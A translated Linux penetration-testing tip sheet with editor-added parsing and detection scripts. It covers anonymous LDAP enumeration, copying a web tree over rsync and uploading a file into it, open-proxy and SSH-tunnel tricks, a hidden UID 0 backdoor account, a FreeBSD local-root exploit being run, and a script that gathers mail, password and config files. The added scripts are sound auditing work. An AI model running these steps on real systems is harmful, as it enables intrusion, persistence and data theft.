Linux Penetration and Privilege Escalation: Techniques Summary

Common file paths on Linux systems (the kind of list used when probing a file-read or local-file-inclusion bug: account files, web roots, httpd/php/mysql configuration and log files):


/etc/passwd
/etc/shadow
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/www/index.html
/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_log.old
/usr/local/apache/logs/error_log.old
/etc/php.ini
/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh

Linux privilege-escalation and penetration tips, part 1: LDAP

1. cat /etc/nsswitch.conf

Check where account lookups go. Here the passwd/shadow entries read "files ldap", i.e. accounts are resolved from the local files first and then from the LDAP directory.

2. less /etc/ldap.conf
   base ou=People,dc=unix-center,dc=net

This gives the base DN (the ou and dc components) that the client searches under.

3. Look up the administrator entry

Without a password (the page calls this the anonymous form: a bind DN is given but no credential, an "unauthenticated" bind; whether the server accepts it as anonymous depends on its configuration):

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

With a password (-W prompts for it):

ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

Note that ldap.conf above names the container ou=People while these commands use cn=People. Take the RDN from the client configuration or from a base search rather than guessing it. -h and -p are the old host/port flags; recent OpenLDAP clients take -H ldap://host:port instead.

4. Fetch 10 user records (-z is the size limit on returned entries; the base DN comes from ldap.conf when -b is omitted)

ldapsearch -h 192.168.2.2 -x -z 10 -p <port>



Penetration practice:

1. Return every entry under the suffix with all attributes (subtree search). Here this is an anonymous search against a Sun directory; the "version: 1" header is the LDIF marker printed by Sun's ldapsearch. Four accounts come back, including manager, superadmin and admin:

ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous

2. View the base entry only (scope base on the suffix):

bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

3. Query the root DSE (empty base DN, scope base). Servers normally let anyone read it, and it tells you the naming contexts to search next, the vendor and exact version, the SASL mechanisms, which protocol versions are accepted and the TLS cipher list. In this output LDAPv2 is still enabled and the cipher list includes NULL, export-grade, single-DES, RC4 and SSLv2-era (SSL_CK_*) suites:

bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
supportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
supportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
supportedControl: 2.16.840.1.113730.3.4.17
supportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
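The two ldapsearch results above are only useful once you pull the facts out of them: which suffixes to search next, which accounts exist, whether LDAPv2 is still accepted and how many weak TLS suites are advertised. The script below is an added example, not code from the original post. Its two samples are trimmed copies of the root DSE and subtree output shown above, embedded so that it runs offline; in real use, pipe a live ldapsearch into the same functions (the comment shows the call). The weak-cipher pattern is the editor's choice, not something the page defines.

```shell
#!/bin/sh
# Added example: extract the security-relevant facts from LDIF that an
# anonymous ldapsearch returns. Samples are trimmed copies of the output
# shown on the page. Real use:
#   ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*" | count_weak_ciphers
# Limitation: base64 ("::") values and folded continuation lines are not unwrapped.

SAMPLE_ROOTDSE='dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5'

SAMPLE_SUBTREE='dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson'

# Print the value of every "<attr>: value" line for one attribute name (stdin).
ldif_attr() {
    awk -v a="$1" 'index($0, a ":") == 1 { sub(/^[^:]*: */, ""); print }'
}

# Suffixes to search next with -b (dc=ruc,dc=edu,dc=cn on the page came from here).
naming_contexts() { ldif_attr namingContexts; }

# Does the server still advertise LDAPv2, which predates SASL binds and StartTLS?
allows_ldapv2() {
    if ldif_attr supportedLDAPVersion | grep -qx 2; then echo yes; else echo no; fi
}

# Count advertised suites that are NULL, export-grade, single DES, RC4 or
# SSLv2-era (SSL_CK_*). The pattern is an editor's choice; none should be enabled.
count_weak_ciphers() {
    ldif_attr supportedSSLCiphers |
        awk '/NULL|EXPORT|_DES_|RC4|^SSL_CK_/ { n++ } END { print n + 0 }'
}

# Account names that an anonymous subtree search leaks (uid attribute).
list_uids() { ldif_attr uid; }

# Stand-alone run over the embedded samples.
printf '%s\n' "$SAMPLE_ROOTDSE" | naming_contexts
printf '%s\n' "$SAMPLE_ROOTDSE" | allows_ldapv2
printf '%s\n' "$SAMPLE_ROOTDSE" | count_weak_ciphers
printf '%s\n' "$SAMPLE_SUBTREE" | list_uids
```

The uid list is the input for the next step on the page (trying the accounts with -D and -W); the naming context is what you pass to -b once the root DSE has told you the suffix.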


 

Linux privilege-escalation and penetration tips, part 2: NFS

List the exports (the original says "list IPs", but showmount -e lists the exported directories together with the clients allowed to mount each one):

showmount -e <ip>
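What matters in the showmount output is which exports any host may mount. The functions below are an added example, not from the original post; the export list is constructed to look like nfs-utils output (Linux prints "*" for an unrestricted export, FreeBSD prints "Everyone"), and the IP and paths are made up. In real use replace the sample with the output of showmount -e against the target.

```shell
#!/bin/sh
# Added example: pick out world-mountable exports from `showmount -e` output.
# SAMPLE_EXPORTS is constructed; real use: showmount -e "$target" | nfs_world_exports

SAMPLE_EXPORTS='Export list for 192.168.2.2:
/home           *
/srv/backup     10.0.0.0/8,192.168.2.0/24
/export/www     Everyone
/var/nfs/share  *.corp.example'

# "path clients" for every export line; the first line is the header.
nfs_exports() {
    awk 'NR > 1 && NF >= 2 { print $1, $2 }'
}

# Exports whose client list contains an unrestricted entry. A wildcard
# domain such as *.corp.example is not "everyone" and is left out.
nfs_world_exports() {
    nfs_exports | awk '{
        n = split($2, c, ",")
        for (i = 1; i <= n; i++)
            if (c[i] == "*" || c[i] == "Everyone" || c[i] == "(everyone)") {
                print $1
                break
            }
    }'
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_EXPORTS" | nfs_world_exports
```

The next step for a flagged export is mount -t nfs <ip>:<export> /mnt/nfs. Once mounted, create a file as root and check its owner on the share: if it arrives as nobody the server applies root_squash; if it stays root-owned the export uses no_root_squash, which is the privilege-escalation case, since root-owned setuid binaries can then be planted on a file system the target mounts.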

Linux privilege-escalation and penetration tips, part 3: rsync

1. List the modules on an rsync server (a host followed by a bare :: talks to the rsync daemon, TCP 873, and prints every module it offers):

rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book

Look at the next level inside a module (note the trailing slash after the module name; it is required):

rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

2. Pull the server's files (here the web application tree and its configuration files) to a local directory:

rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3. Push a file up into the module. The upload succeeded, which means the module is not read-only. Nothing else in the target is removed (no --delete), although a file with the same name would be overwritten unless --ignore-existing is given; test with --dry-run (-n) before pushing anything:

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

The pushed file is then reachable through the site, here as http://app.finance.xxx.com/warn/nothack.txt



Linux privilege-escalation and penetration tips, part 4: squid (open-proxy test)

Connect to the proxy port with netcat and send an absolute-URI request, followed by an empty line to end the headers. If the page comes back, the proxy relays for anyone. Repeating the request with a non-HTTP port (22 here) tests whether it also relays to arbitrary ports, which is what makes an open proxy useful for reaching internal hosts; Squid's default Safe_ports ACL denies this.

nc -vv <proxy-ip> 80
GET http://www.sina.com/ HTTP/1.0

GET http://www.sina.com:22/ HTTP/1.0



Linux privilege-escalation and penetration tips, part 5: SSH port forwarding

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

This is a remote (reverse) forward: after logging in to ip as cnbird, port 44 on that host is forwarded back to 127.0.0.1:22 on the machine running the command, so a user on ip reaches this machine's SSH service via localhost:44. -C compresses the tunnel, -f backgrounds ssh after authentication and -N runs no remote command. Note that -g only affects local (-L) forwards; whether the remote end of an -R forward listens on all interfaces or on loopback only is decided by the server's GatewayPorts setting.



Linux privilege-escalation and penetration tips, part 6: Joomla tips

Determine the version: the article below is part of Joomla 1.5's default sample content (the alias "what-languages-are-supported-by-joomla-15" names the version), so if it resolves the site is a 1.5 install:

index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

Reset a password: the confirmation step of the com_user password-reset flow:

index.php?option=com_user&view=reset&layout=confirm



Linux privilege-escalation and penetration tips, part 7: add a second UID 0 (root-equivalent) user on Linux

useradd -o -u 0 nothack

-o allows a non-unique UID, which is otherwise refused; set a password with passwd nothack afterwards. The new account is root in every way the kernel cares about, and sshd's PermitRootLogin applies to any UID 0 account, not only to the name root.
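The defensive side of this trick is a one-line check of /etc/passwd for extra UID 0 accounts. The script below is an added example, not from the original post; its passwd data is constructed (including the nothack account the command above would create) so that it runs offline. In real use read /etc/passwd instead of the sample.

```shell
#!/bin/sh
# Added example: detect accounts sharing UID 0, the artefact of
# `useradd -o -u 0 <name>`. SAMPLE_PASSWD is constructed; real use:
#   uid0_accounts < /etc/passwd

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nothack:x:0:1001::/home/nothack:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:0:0:backup:/var/backups:/bin/sh'

# Every account whose numeric UID (field 3) is 0 except the canonical root.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# The general form: any UID shared by more than one account, since -o
# permits duplicates of any UID, not only 0. Prints "uid: name,name,...".
duplicate_uids() {
    awk -F: '{
        if ($3 in names) names[$3] = names[$3] "," $1; else names[$3] = $1
        count[$3]++
    }
    END { for (u in count) if (count[u] > 1) print u ": " names[u] }' | sort -n
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_PASSWD" | uid0_accounts
printf '%s\n' "$SAMPLE_PASSWD" | duplicate_uids
```

On a live system also compare the result against /etc/shadow (a UID 0 account with a usable password hash is the finding) and against the useradd entries in auth.log or secure, which record when the account was created.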



Linux privilege-escalation and penetration tips, part 8: FreeBSD local privilege escalation

The transcript shows the preconditions being checked before the exploit is run: the release (7.3-RELEASE, GENERIC kernel), vfs.usermount=1 (unprivileged users may mount file systems, which a non-root call to nmount() requires) and an unprivileged starting uid. The exploit source nfs_mount_ex.c is not reproduced on this page.

[argp@julius ~]$ uname -rsi
FreeBSD 7.3-RELEASE GENERIC
[argp@julius ~]$ sysctl vfs.usermount
vfs.usermount: 1
[argp@julius ~]$ id
uid=1001(argp) gid=1001(argp) groups=1001(argp)
[argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
[argp@julius ~]$ ./nfs_mount_ex
calling nmount()



Packing a directory with tar:

1. tar packing. The original line put the archive name inside the source path and glued --exclude onto it; a working form writes the archive outside the tree being packed (otherwise tar finds its own output inside the tree) and quotes the patterns so the shell does not expand them. Exclude patterns are matched against the stored member names, from which tar strips the leading slash, so write them without it:

tar -cvf /tmp/public_html.tar --exclude='*.gif' --exclude='xx/xx/*' /home/public_html

ALZip (Korean archiver, Windows) packing: alzip -a D:/WEB d:/web*.rar

{

Note:

Linux does not decide a file's type by its extension, so naming the archive .tar says nothing about whether it is compressed.

For a compressed archive, tar -ztf file.tar.gz lists the contents and tar -zxf file.tar.gz extracts it.

So this form is better:

tar -czf /tmp/public_html.tar.gz --exclude='*.gif' --exclude='xx/xx/*' /home/public_html

}

System information collection:

For Linux. The original script had several bugs that are fixed here: unquoted echo arguments that the shell treated as comments (so the banners printed nothing), a broken quote in the id line, ipconfig instead of ifconfig, 2>dev/null missing its slash, and a for loop without do.

#!/bin/bash
# getinfo.sh: collect basic system information once you have a shell.
# usage: ./getinfo.sh > /tmp/sysinfo.txt
echo "####### getting sysinfo ####"
echo "###### usage: ./getinfo.sh > /tmp/sysinfo.txt"
echo "####### basic information ##"
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
###### grab the mail spool ######
cp -a /var/mail /tmp/getmail 2>/dev/null
echo "your id is: $(id)"
echo "### atq & crontab ####"
atq
crontab -l
echo "##### environment variables #####"
set
echo "##### about network ###"
#### this is the point of a pentest, but I am a new bird, so you need to add more here
cat /etc/hosts
hostname
ifconfig -a
arp -v
echo "######## users ####"
grep -i sh /etc/passwd
echo "###### services ####"
chkconfig --list
for i in oracle mysql tomcat samba apache ftp; do
    grep -i "$i" /etc/passwd
done
# locate depends on an up-to-date locate database
locate passwd > /tmp/password 2>/dev/null
sleep 5
locate password >> /tmp/password 2>/dev/null
sleep 5
locate conf > /tmp/sysconfig 2>/dev/null
sleep 5
locate config >> /tmp/sysconfig 2>/dev/null
sleep 5
### maybe "tree /" can be used as well ###
echo "## packing up #########"
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

